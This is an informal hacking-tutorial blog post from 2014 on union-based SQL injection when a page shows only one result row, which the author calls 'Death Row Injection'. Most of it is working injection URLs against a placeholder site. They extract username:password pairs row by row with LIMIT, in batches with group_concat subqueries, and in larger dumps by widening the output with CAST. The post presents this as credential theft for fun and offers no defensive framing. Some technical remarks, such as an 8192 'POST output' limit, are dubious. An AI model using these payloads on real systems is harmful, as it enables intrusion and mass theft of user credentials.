As we discussed The basics of SQL injection let us continue with our Second Injection which is again the Basic Injection but this time we are doing the "Death Row Injection"


What is Death row?

While injecting a Web application you will usually face it, this is the scenario when the whole array output of the Query do not gets printed. The web application only prints the first.

For Example:

The query "Select username,password from users;" Will output the complete list of users. but now it depends on how the web application is giving you output. So normally in 70% cases you may have to face "Death Row Injection"

To overcome such situation we use Limit or if we are intelligent enough to make a condition through which we can output the data which we actually need. Here we will discuss both of these ways.

Let us First understand the Internal Queries.

Select username from users;


This will output all the usernames...but our target web application is outputting only 1. So in order to iterate through the situation we will user limit.

Syntax : Limit "From Row Number", "Number of Rows"

I hope its very clear to understand that the first parameter takes the row number from which you want to start, and the second one takes number of rows you want to output.

Now let us try it with the above Query

Select Username from users limit 0,1;


Example from the injection Point of view

www.vuln-site.com/index.php?view=43


If you have read the basic injection then i don't need to tell you how to get the error and then comment out the rest part and then find the number of columns. After doing all that let us assume the injection is:

www.vuln-site.com/index.php?view=-43 union select 1,2,3,4,5--


As you can see single Quote is missing after 43 that means i am injecting in a integer Input Query. So now when we try to get the usernames and password using the above Query.

www.vuln-site.com/index.php?view=43 union select 1,2,concat(username,0x3a,password),4,5 from users--


The above query will output all rows as once but the web application may just return one. So to get all using Limit we will go one by one.

First Row : www.vuln-site.com/index.php?view=43 union select 1,2,concat(username,0x3a,password),4,5 from users limit 0,1--
Second Row : www.vuln-site.com/index.php?view=43 union select 1,2,concat(username,0x3a,password),4,5 from users limit 1,1--(2nd row)
Nth Row : www.vuln-site.com/index.php?view=43 union select 1,2,concat(username,0x3a,password),4,5 from users limit n,1--(nth row)


So now we can keep increasing the first parameter to get each row one by one. But if the database is huge. Damnnn...its a headache to go like this. And a lazy guy like me will never like to go through this torture. Yeah so now there is an another way to handle the situation.

We can use Sub Query to extract particular number of rows from the Database and then concat them into the output. Herez an example to do this one:

Query:
select group_concat(username,0x3a,password,0x0a)from (select username,password from users limit 0,100);


So the above query got 100 rows conctenated into the output. Lets see how the Injection will look like.

First 100 rows
www.vuln-site.com/index.php?view=43 union select 1,2,group_concat(username,0x3a,password),4,5 from (select username,password from users limit 0,100)a--
100 rows from 100th row
www.vuln-site.com/index.php?view=43 union select 1,2,group_concat(username,0x3a,password),4,5 from (select username,password from users limit 100,100)a--
100 rows from nth row
www.vuln-site.com/index.php?view=43 union select 1,2,group_concat(username,0x3a,password),4,5 from (select username,password from users limit n,100)a--


In this way we can speed up the Process...But again if the we think of a Database Containing lacks of Rows. It again becomes a headache. So one will think that we we can increase the number of rows each time we Inject to fasten up the process. Hmmmm but a problem, Group_concat function have a limit of 1024 characters and it will Trim the rest of characters. So there is another way out of it. we can use the Cast Function to increase the Buffer.

Query:
SELECT CAST(GROUP_CONCAT(username,0x3a,password,0x0a) AS CHAR(2048)) FROM users;


I have increase the buffer to 2048, you can try and increase more like increasing 8192, but not more than that as you know its the default limit of a POST output. hmmm so what if you cant get all at once?. we can again use the Sub Query trick.

SELECT CAST(GROUP_CONCAT(username,0x3a,password,0x0a) AS CHAR(2048)) FROM (SELECT username,password FROM users LIMIT 0,2000)a;


Well Now the process is enough faster. Let us check our Injection.

First 2000 rows:
www.vuln-site.com/index.php?view=43 union SELECT 1,2,CAST(GROUP_CONCAT(username, 0x3a,password,0x0a) AS CHAR(2048)),4,5 FROM (SELECT username,password FROM users LIMIT 0,2000)a--
2000 rows from 2000th row
www.vuln-site.com/index.php?view=43 union SELECT 1,2,CAST(GROUP_CONCAT(username, 0x3a,password,0x0a) AS CHAR(2048)),4,5 FROM (SELECT username,password FROM users LIMIT 2000,2000)a--()
2000 rows from nth row
www.vuln-site.com/index.php?view=43 union SELECT 1,2,CAST(GROUP_CONCAT(username, 0x3a,password,0x0a) AS CHAR(2048)),4,5 FROM (SELECT username,password FROM users LIMIT n,2000)a--


Well if you are still feeling lazy? then try Evil Twin Injection which uses Variable, functions and Sub queries to dump the Database in a Much Faster way.

Have Fun Enjoy Hacking.

Author : Zenodermus Javanicus
Date : 2014-03-17